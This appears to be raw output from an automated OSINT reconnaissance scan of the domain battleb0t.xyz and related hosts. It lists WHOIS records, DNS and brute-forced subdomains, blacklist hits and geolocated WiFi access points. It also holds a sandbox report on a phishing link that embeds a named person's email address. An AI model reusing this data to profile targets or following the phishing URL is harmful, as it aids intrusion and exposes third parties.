information about domain name registration records. Any use of this data for any other purpose
is expressly forbidden without the prior written permission of this registrar. By submitting
an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not
to use this data to allow, enable, or otherwise support the dissemination or collection of this
data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone,
postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations
of any kind, including spam. You further agree not to use this data to enable high volume, automated
or robotic electronic processes designed to collect or compile this data for any purpose, including
mining this data for your own personal or commercial purposes. Failure to comply with these terms
may result in termination of access to the Whois database. These terms may be subject to modification
at any time without notice.
|
| 2023-05-12 03:31:32 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | abuse@resellercamp.com | Domain Name: AIHU.XYZ
Registry Domain ID: D351663834-CNIC
Registrar WHOIS Server: whois.resellercamp.com
Registrar URL: https://idwebhost.com
Updated Date: 2023-03-07T15:29:15.0Z
Creation Date: 2023-03-02T11:39:51.0Z
Registry Expiry Date: 2024-03-02T23:59:59.0Z
Registrar: CV Jogjacamp
Registrar IANA ID: 1478
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant Organization: FENG SHENG FEI XING
Registrant State/Province: Jiangsu
Registrant Country: CN
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: NS1.DAN.COM
Name Server: NS2.DAN.COM
Name Server: VERIFICATION-EE5FF475.NS3.DAN.HOSTING
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@resellercamp.com
Registrar Abuse Contact Phone: +62.82141570000
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:17:32.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: AIHU.XYZ
Registry Domain ID: D351663834-CNIC
Registrar WHOIS Server: whois.resellercamp.com
Registrar URL: http://resellercamp.com/
Updated Date: 2023-03-02T11:40:08Z
Creation Date: 2023-03-02T11:39:51Z
Registrar Registration Expiration Date: 2024-03-02T23:59:59Z
Registrar: CV. Jogjacamp
Registrar IANA ID: 1478
Registrar Abuse Contact Email: abuse@resellercamp.com
Registrar Abuse Contact Phone: +62.82141570000
Domain Status: clientTransferProhibited (http://icann.org/epp#clientTransferProhibited)
Registrant Organization: FENG SHENG FEI XING
Registrant State/Province: Jiangsu
Registrant Country: CN
Name Server: ns1.dan.com
Name Server: ns2.dan.com
Name Server: verification-ee5ff475.ns3.dan.hosting
DNSSEC: Unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>>Last update of WHOIS database: 2023-05-12T03:02:33Z<<<
For more information on Whois status codes, please visit https://icann.org/epp
Registration Service Provided By: PREMIUMDOMAINSELLER
The data in this whois database is provided to you for information purposes
only, that is, to assist you in obtaining information about or related to a
domain name registration record. We make this information available "as is",
and do not guarantee its accuracy. By submitting a whois query, you agree
that you will use this data only for lawful purposes and that, under no
circumstances will you use this data to:
(1) enable high volume, automated, electronic processes that stress or load
this whois database system providing you this information; or
(2) allow, enable, or otherwise support the transmission of mass unsolicited,
commercial advertising or solicitations via direct mail, electronic mail, or
by telephone.
The compilation, repackaging, dissemination or other use of this data is
expressly prohibited without prior written consent from us. The Registrar of
record is CV. Jogjacamp.
We reserve the right to modify these terms at any time.
By submitting this query, you agree to abide by these terms.
|
| 2023-05-12 02:53:52 | Raw Data from RIRs | No | Censys | 0 | 0 | 2 | 0 | None | {"last_updated_at": "2023-05-11T23:53:52.386Z", "ip": "2606:50c0:8003::153", "location_updated_at": "2023-05-08T14:21:40.589738Z", "autonomous_system_updated_at": "2023-05-08T14:21:40.589787Z", "location": {"province": "California", "city": "San Francisco", "country": "United States", "coordinates": {"latitude": 37.7621, "longitude": -122.3971}, "postal_code": "94107", "country_code": "US", "timezone": "America/Los_Angeles", "continent": "North America"}, "dns": {"records": {"www.willbishop.dev": {"record_type": "CNAME", "resolved_at": "2023-03-06T20:23:13.520153960Z"}, "www.bwalshy.com": {"record_type": "CNAME", "resolved_at": "2023-05-03T14:00:22.144392997Z"}, "www.torstengoerke.de": {"record_type": "CNAME", "resolved_at": "2023-04-27T17:43:29.486037892Z"}, "www.rohanseth.dev": {"record_type": "CNAME", "resolved_at": "2023-02-22T00:00:27.264834898Z"}, "www.asiavalentine.dev": {"record_type": "CNAME", "resolved_at": "2023-03-05T15:52:15.471978167Z"}, "catclicker.zaklaughton.dev": {"record_type": "CNAME", "resolved_at": "2023-03-22T17:42:34.665120760Z"}, "www.omkardhande.dev": {"record_type": "CNAME", "resolved_at": "2023-03-22T07:55:27.721595395Z"}, "www.montferret.dev": {"record_type": "CNAME", "resolved_at": "2023-03-20T01:17:26.803641174Z"}, "www.mopboygame.com": {"record_type": "CNAME", "resolved_at": "2023-04-26T15:40:46.290988158Z"}, "hkatz.dev": {"record_type": "AAAA", "resolved_at": "2023-03-22T11:14:05.854477536Z"}, "www.davidzlchen.com": {"record_type": "CNAME", "resolved_at": "2023-01-02T13:08:47.912274315Z"}, "msk.im": {"record_type": "AAAA", "resolved_at": "2023-05-09T17:24:25.369430576Z"}, "web-dev.docs.inditex.dev": {"record_type": "CNAME", "resolved_at": "2023-03-04T15:55:36.047967881Z"}, "svelte.calories.claas.dev": {"record_type": "CNAME", "resolved_at": "2023-04-04T16:51:51.844422366Z"}, "namco.dev": {"record_type": "AAAA", "resolved_at": 
"2023-01-19T14:14:45.143590011Z"}, "www.shaneporter.dev": {"record_type": "CNAME", "resolved_at": "2023-03-21T00:20:35.708785655Z"}, "thaecohvah.syntactic-sugar.design": {"record_type": "CNAME", "resolved_at": "2023-04-23T09:37:19.694810939Z"}, "bbs.codecrh.com": {"record_type": "CNAME", "resolved_at": "2023-03-22T17:22:29.106820702Z"}, "kbau.dev": {"record_type": "AAAA", "resolved_at": "2023-02-27T15:42:55.285099290Z"}, "www.kazusato.dev": {"record_type": "CNAME", "resolved_at": "2023-03-05T15:53:18.300056949Z"}, "cuillere.dev": {"record_type": "AAAA", "resolved_at": "2023-04-24T16:59:59.805050461Z"}, "www.srinivasreddy.dev": {"record_type": "CNAME", "resolved_at": "2023-03-02T15:51:53.148982927Z"}, "www.cliu.dev": {"record_type": "CNAME", "resolved_at": "2023-03-24T23:25:10.893500128Z"}, "www.brothersistershow.com": {"record_type": "CNAME", "resolved_at": "2023-04-18T14:08:02.708910195Z"}, "www.notsostandardmodel.com": {"record_type": "CNAME", "resolved_at": "2023-03-01T14:47:59.242829135Z"}, "kaiseki.coderfin.dev": {"record_type": "CNAME", "resolved_at": "2023-03-13T16:02:42.934790176Z"}, "www.robisonweb.dev": {"record_type": "CNAME", "resolved_at": "2023-02-28T15:51:22.213479983Z"}, "www.yshemesh.com": {"record_type": "CNAME", "resolved_at": "2023-03-20T14:55:03.301623541Z"}, "trubbylove.laury.dev": {"record_type": "CNAME", "resolved_at": "2023-03-22T00:18:26.457996047Z"}, "blog.hiluohao.com": {"record_type": "CNAME", "resolved_at": "2023-03-28T14:57:36.831718722Z"}, "www.yusry.de": {"record_type": "CNAME", "resolved_at": "2023-04-23T16:48:40.403075909Z"}, "www.bboey.com": {"record_type": "CNAME", "resolved_at": "2023-05-10T14:00:09.830879590Z"}, "xn--nschtos-n2a.de": {"record_type": "AAAA", "resolved_at": "2023-04-16T16:34:59.210581178Z"}, "treader.calbertts.com": {"record_type": "CNAME", "resolved_at": "2023-05-05T14:10:44.551458266Z"}, "data-observability-tag.docs.inditex.dev": {"record_type": "CNAME", "resolved_at": "2023-03-19T15:35:12.630016737Z"}, 
"www.ttlresearch.com": {"record_type": "CNAME", "resolved_at": "2023-04-14T20:20:06.761328463Z"}, "siuts.proekspert.ee": {"record_type": "CNAME", "resolved_at": "2023-02-08T17:06:34.527975069Z"}, "www.dannytran.dev": {"record_type": "CNAME", "resolved_at": "2023-03-17T15:48:34.941987381Z"}, "yanshouwang.dev": {"record_type": "AAAA", "resolved_at": "2023-03-21T00:21:54.271513621Z"}, "www.hiennguyen.dev": {"record_type": "CNAME", "resolved_at": "2023-03-07T12:59:42.443779889Z"}, "www.kiernanro.ch": {"record_type": "CNAME", "resolved_at": "2023-03-23T13:12:26.767995363Z"}, "database.jiny.dev": {"record_type": "CNAME", "resolved_at": "2023-03-21T00:19:55.315272389Z"}, "www.tcamba.dev": {"record_type": "CNAME", "resolved_at": "2023-03-23T17:56:56.616082497Z"}, "blog.brandonmathis.me": {"record_type": "CNAME", "resolved_at": "2023-03-21T21:08:33.485121539Z"}, "blog.limeira.dev": {"record_type": "CNAME", "resolved_at": "2023-03-02T15:51:35.974650849Z"}, "www.nstech.dev": {"record_type": "CNAME", "resolved_at": "2023-03-19T15:35:46.912831706Z"}, "capital-commerce.com": {"record_type": "AAAA", "resolved_at": "2023-01-20T13:04:55.684473451Z"}, "www.maxnoll.eu": {"record_type": "CNAME", "resolved_at": "2023-03-21T00:43:19.504818787Z"}, "reacticz.t0m.fr": {"record_type": "CNAME", "resolved_at": "2023-04-02T17:20:42.618600257Z"}, "help.programm-chest.dev": {"record_type": "CNAME", "resolved_at": "2022-11-30T14:37:46.643013242Z"}, "www.craftandtechnology.com": {"record_type": "CNAME", "resolved_at": "2023-03-18T01:10:11.324465510Z"}, "opalab.github.io": {"record_type": "AAAA", "resolved_at": "2023-03-16T04:35:35.248516488Z"}, "flagicons.lipis.dev": {"record_type": "CNAME", "resolved_at": "2023-03-19T15:35:16.844777559Z"}, "www.danieljulio.com": {"record_type": "CNAME", "resolved_at": "2023-03-18T14:08:52.867040001Z"}, "www.cnlei.com": {"record_type": "CNAME", "resolved_at": "2023-02-28T13:43:40.358046729Z"}, "www.aashish.dev": {"record_type": "CNAME", "resolved_at": 
"2023-04-19T19:07:09.565393850Z"}, "www.titanstudios.dev": {"record_type": "CNAME", "resolved_at": "2023-03-17T15:48:47.515393867Z"}, "www.functionbetter.fit": {"record_type": "CNAME", "resolved_at": "2023-03-20T16:32:53.588221818Z"}, "rtlien.coleprice.com": {"record_type": "CNAME", "resolved_at": "2023-03-23T14:54:52.339226041Z"}, "www.matthewpereira.com": {"record_type": "CNAME", "resolved_at": "2023-03-25T21:28:16.599843999Z"}, "docs.telestion.wuespace.de": {"record_type": "CNAME", "resolved_at": "2023-05-01T16:17:39.668319874Z"}, "shop4data-ui.docs.collibra.dev": {"record_type": "CNAME", "resolved_at": "2023-03-22T00:18:31.647476511Z"}, "resume.chann.dev": {"record_type": "CNAME", "resolved_at": "2023-03-20T16:16:20.658403265Z"}, "www.wazted.fr": {"record_type": "CNAME", "resolved_at": "2023-05-11T17:32:27.312675959Z"}, "www.mtconnectcore.dev": {"record_type": "CNAME", "resolved_at": "2023-03-16T14:59:11.184709249Z"}, "www.aloha.org.cn": {"record_type": "CNAME", "resolved_at": "2022-12-14T12:40:48.602824216Z"}, "www.mangato.es": {"record_type": "CNAME", "resolved_at": "2023-04-22T16:31:05.591550189Z"}, "www.williamjang.dev": {"record_type": "CNAME", "resolved_at": "2023-03-11T15:47:39.271340346Z"}, "www.saiko-no-chimu.fr": {"record_type": "CNAME", "resolved_at": "2023-04-13T02:41:03.551470009Z"}, "reitti.vanhala.fi": {"record_type": "CNAME", "resolved_at": "2023-05-05T16:50:09.151032357Z"}, "myreads.zaklaughton.dev": {"record_type": "CNAME", "resolved_at": "2023-02-26T21:11:31.059545269Z"}, "www.deltaprowashllc.com": {"record_type": "CNAME", "resolved_at": "2023-03-18T21:11:27.189924094Z"}, "www.stevesarmiento.com": {"record_type": "CNAME", "resolved_at": "2022-11-11T13:54:37.912711550Z"}, "stevenbone.dev": {"record_type": "AAAA", "resolved_at": "2023-04-20T02:37:36.462044411Z"}, "www.dwivedula.dev": {"record_type": "CNAME", "resolved_at": "2023-03-07T15:37:48.541873098Z"}, "sidecycle.com": {"record_type": "AAAA", "resolved_at": 
"2022-11-20T14:02:08.191705875Z"}, "playbook.truss.works": {"record_type": "CNAME", "resolved_at": "2023-04-30T04:35:55.131404897Z"}, "www.ousmane.dev": {"record_type": "CNAME", "resolved_at": "2023-03-22T15:03:29.723057364Z"}, "www.shira.dev": {"record_type": "CNAME", "resolved_at": "2023-03-22T17:45:59.585738764Z"}, "www.charliegillespie.com": {"record_type": "CNAME", "resolved_at": "2023-04-08T14:40:51.472581029Z"}, "www.thyagajan.in": {"record_type": "CNAME", "resolved_at": "2023-02-04T15:11:06.016790048Z"}, "www.lawrencedunbar.dev": {"record_type": "CNAME", "resolved_at": "2023-03-08T15:50:22.533060749Z"}, "www.coltonfalkner.dev": {"record_type": "CNAME", "resolved_at": "2023-03-22T19:22:40.169282211Z"}, "andressa.dev": {"record_type": "CNAME", "resolved_at": "2023-04-13T16:15:01.948884742Z"}, "www.dangillis.dev": {"record_type": "CNAME", "resolved_at": "2023-03-05T15:53:20.930987816Z"}, "www.jasonscotto.dev": {"record_type": "CNAME", "resolved_at": "2023-03-16T04:01:31.543104004Z"}, "cedarpark.com": {"record_type": "AAAA", "resolved_at": "2023-03-22T15:00:17.822135807Z"}, "www.tacxtv.fr": {"record_type": "CNAME", "resolved_at": "2023-03-28T17:40:47.840300196Z"}, "www.ologn.dev": {"record_type": "CNAME", "resolved_at": "2023-02-14T15:37:29.279040979Z"}, "www.sreehari.dev": {"record_type": "CNAME", "resolved_at": "2023-03-14T15:27:59.231327405Z"}, "www.jenniferyaya.ca": {"record_type": "CNAME", "resolved_at": "2023-05-11T12:50:41.791793242Z"}, "www.grantanna.dev": {"record_type": "CNAME", "resolved_at": "2023-02-27T15:42:47.651834600Z"}, "web.thecatcloud.de": {"record_type": "CNAME", "resolved_at": "2023-04-30T22:07:01.094811475Z"}, "www.framy.dev": {"record_type": "CNAME", "resolved_at": "2023-03-04T15:55:45.611656444Z"}, "www.oscarablinger.dev": {"record_type": "CNAME", "resolved_at": "2023-05-01T09:06:38.146245867Z"}, "abeziou.dev": {"record_type": "AAAA", "resolved_at": "2023-03-27T23:40:41.232028838Z"}, "www.valtech.engineering": {"record_type": "CNAME", 
"resolved_at": "2023-05-09T17:01:27.306622794Z"}, "www.lobber.se": {"record_type": "CNAME", "resolved_at": "2023-04-05T21:01:06.815879177Z"}, "www.codar.dev": {"record_type": "CNAME", "resolved_at": "2023-03-22T07:54:18.450070838Z"}, "www.ky1vstar.dev": {"record_type": "CNAME", "resolved_at": "2023-03-11T15:47:22.392376650Z"}}, "names": ["opalab.github.io", "www.yusry.de", "www.willbishop.dev", "datab | 2606:50c0:8003::153 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:04:5A:CF:BB:35) | 39.0469, -77.4903 |
| 2023-05-12 02:46:54 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://bcpzonasegurabeta.viabcp.com', u'type': u'extracted', u'verdict': u'malicious'}, {u'url': u'https://github.com/facebook/regenerator/blob/main/license', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 30, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://llink.to/?u=https%3A%2F%2Fdev.protektnet.com%2FMNU%2Fheathus.com%2Fshena.dipuccio%40heathus.com', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:3740:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:3740:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:3740:120:WilError_01"\n "Local\\SM0:7244:304:WilStaging_02"\n "SM0:7244:120:WilError_01"\n "InternetShortcutMutex"\n "Local\\SM0:7244:120:WilError_01"\n "Local\\SM0:3740:304:WilStaging_02"\n "SM0:3740:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:3740:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.111.153:443"\n "172.66.40.106:443"\n "172.67.212.13:443"\n "35.186.254.174:443"\n "104.18.11.207:443"\n "172.67.71.45:443"\n 
"142.251.46.228:443"\n "142.251.32.35:443"\n "142.250.191.35:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.salesflare.com"\n "dev.protektnet.com"\n "llink.to"\n "stackpath.bootstrapcdn.com"\n "track.salesflare.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'""linkedin.com"," (Indicator: "linkedin.com")\n ""netflix.com"," (Indicator: "netflix.com")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlref_httpsllink.tou_https%3A%2F%2Fdev.protektnet.com%2FMNU%2Fheathus.com%2Fshena.dipuccio%40heathus.com" as clean (type is "HTML document ASCII text")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-23', u'name': u'Detected known bank URL artifact', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'""amazingclubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""basbleu.com"," (Source: wallet-tokenization-config.json, Indicator: "leu.com")\n ""firehousesubs.com"," (Source: wallet-tokenization-config.json, Indicator: 
"ubs.com")\n ""highkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""mandalascrubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""manitobaharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""primalharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlref_httpsllink.tou_https%3A%2F%2Fdev.protektnet.com%2FMNU%2Fheathus.com%2Fshena.dipuccio%40heathus.com" has type "HTML document ASCII text"- [targetUID: N/A]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Sync Data\\LevelDB\\000003.log]- [targetUID: 00000000-00003740]\n "shopping_fre.html" has type "HTML document ASCII text with CRLF line terminators"- Location: [%PROGRAMFILES%\\chrome_ComponentUnpacker_BeginUnzipping3740_1784626035\\shopping_fre.html]- [targetUID: 00000000-00003740]\n "a8ce5196df51c32c_0" has type "data"- [targetUID: N/A]\n "tokenized-card.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%PROGRAMFILES%\\chrome_ComponentUnpacker_BeginUnzipping3740_876332896\\Tokenized-Card\\tokenized-card.bundle.js]- [targetUID: 00000000-00003740]\n "1ac9cebe-dd88-4786-8bde-557b7c339a54.tmp" has type "gzip compressed data from FAT filesystem (MS-DOS OS/2 NT) original size modulo 2^32 411849"- Location: [%TEMP%\\1ac9cebe-dd88-4786-8bde-557b7c339a54.tmp]- [targetUID: 00000000-00003740]\n "index" has type "FoxPro FPT blocks size 768 next free block index 3284796353 field type 0 dBase III DBT version number 0 next free block index 
3238251203"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\DawnCache\\index]- [targetUID: 00000000-00003740]\n "wallet-crypto.html" has type "HTML document ASCII text with very long lines"- [targetUID: N/A]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- [targetUID: N/A]\n "f_00023e" has type "gzip compressed data max compression original size modulo 2^32 411849"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_00023e]- [targetUID: 00000000-00004772]\n "README.md" has type "ASCII text"- Location: [%PROGRAMFILES%\\chrome_ComponentUnpacker_BeginUnzipping3740_876332896\\json\\wallet\\README.md]- [targetUID: 00000000-00003740]\n "8aee08c3-0a5f-4923-9dc4-59aaf03dd9af.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\8aee08c3-0a5f-4923-9dc4-59aaf03dd9af.tmp]- [targetUID: 00000000-00003740]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003740]\n "edge_driver.js.LICENSE.txt" has type "ASCII text"- Location: [%PROGRAMFILES%\\chrome_ComponentUnpacker_BeginUnzipping3740_876332896\\edge_driver.js.LICENSE.txt]- [targetUID: 00000000-00003740]\n "strings.json" has type "JSON data"- Location: [%PROGRAMFILES%\\chrome_ComponentUnpacker_BeginUnzipping3740_876332896\\json\\i18n-shared-components\\zh-Hant\\strings.json]- [targetUID: 00000000-00003740]\n "e155a2a9-b073-47a6-9624-313434670886.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\e155a2a9-b073-47a6-9624-313434670886.tmp]- [targetUID: 00000000-00003740]\n "0d3f4a25-1508-478e-a9de-4edb5637407d.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User 
Data\\Default\\Network\\0d3f4a25-1508-478e-a9de-4edb5637407d.tmp]- [targetUID: 00000000-00004772]\n "wallet-tokenization-config.json" has type "ASCII text"- Location: [%PROGRAMFILES%\\chrome_ComponentUnpacker_BeginUnzipping3740_876332896\\json\\wallet\\wallet-tokenization-config.json]- [targetUID: 00000000-00003740]\n "runtime.bundle.js" has type "ASCII text with very long lines with no line terminators"- Location: [%PROGRAMFILES%\\chrome_ComponentUnpacker_BeginUnzipping3740_876332896\\runtime.bundle.js]- [targetUID: 00000000-00003740]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-169', u'name': u'Found mail related domain names', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/003', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.003', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'Observed email domain:""colourpop.com"," [Source: wallet-checkout-eligible-sites-pre-stable.json]\n Observed email domain:""shop.lovepop.com"," [Source: wallet-checkout-eligible-sites-pre-stable.json]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "www.gap.com"\n Pattern match: "www.gapfactory.com"\n Pattern match: "http://www.w3.org/2000/svg,className:r"\n Pattern match: "https://github.com/jsstyles/css-vendor"\n Pattern match: "https://llink.to/?u=https%3A%2F%2Fdev.protektnet.com%2FMNU%2Fheathus.com%2Fshena.dipuccio%40heathus.com"\n Pattern match: "https://github.com/facebook/regenerator/blob/main/LICENSE"\n Pattern match: "https://track.salesflare.com/flare.js"\n Heuristic match: "api.salesflare.com"\n Heuristic match: "dev.protektnet.com"\n Pattern match: "https://dev.protektnet.com/MNU/site.php"\n 
Pattern match: "https://llink.to"\n Heuristic match: "llink.to"\n Heuristic match: "stackpath.bootstrapcdn.com"\n Heuristic match: "track.salesflare.com"\n Pattern match: "https://edge-conumer-static.azureedge.net/static/edropstatic/2023/03/13/2/static/css/main.64d85253.css,static_js_url:https://edge-conumer-static.azureedge.net/static/edropstatic/2023/03/13/2/static/js/main.f389f055.js,st | 185.199.111.153 |
| 2023-05-12 03:18:49 | Raw File Meta Data | No | File Metadata Extractor | 0 | 0 | 4 | 0 | None | {'Image Orientation': (0x0112) Short=Rotated 180 @ 18} | https://pics.battleb0t.xyz/images/reveloder.jpg |
| 2023-05-12 03:35:46 | Malicious Co-Hosted Site | Yes | OpenDNS | 0 | 0 | 3 | 0 | None | Blocked by OpenDNS [000.lt] | 000.lt |
| 2023-05-12 02:54:38 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]} | 172.67.168.252 |
| 2023-05-12 03:25:19 | Internet Name | No | DNS Brute-forcer | 0 | 0 | 2 | 0 | None | nwapi2.battleb0t.xyz | nwapi.battleb0t.xyz |
| 2023-05-12 03:09:44 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 130.97.148.34.bc.googleusercontent.com | 34.148.97.130 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | zoom (Net ID: 00:01:38:A4:44:3A) | 37.7813933,-122.3918002 |
| 2023-05-12 03:01:21 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.189): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:54:27 | Open TCP Port Banner | No | Censys | 0 | 0 | 4 | 0 | None | HTTP/1.1 404 Not Found
Server: Netlify
X-Nf-Request-Id: 01H04XFP518R0GMRXREDYN35MZ
Date: <REDACTED>
Content-Length: 0
| 2600:1f18:2489:8202::c8 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | TOMTSSID (Net ID: 00:02:2D:39:9A:88) | 50.1188, 8.6843 |
| 2023-05-12 03:32:19 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.10:80 | 188.114.97.0/24 |
| 2023-05-12 02:44:05 | SSL Certificate - Issued to | No | CertSpotter | 0 | 0 | 1 | 0 | None | CN=nwapi.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:15:36 | Physical Location | No | ipstack | 0 | 0 | 2 | 0 | None | Colombia | 188.114.96.1 |
| 2023-05-12 03:09:44 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 128.97.148.34.bc.googleusercontent.com | 34.148.97.128 |
| 2023-05-12 03:09:13 | Affiliate - IP Address | No | DNS Look-aside | 2 | 0 | 3 | 0 | None | 207.154.228.167 | 207.154.228.169 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | iz-wpa (Net ID: 00:01:8E:1A:64:A6) | 37.7813933,-122.3918002 |
| 2023-05-12 03:01:43 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.225): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:00:58 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 0101dd.github.io | 185.199.111.153 |
| 2023-05-12 02:54:38 | Open TCP Port Banner | No | Censys | 0 | 0 | 3 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
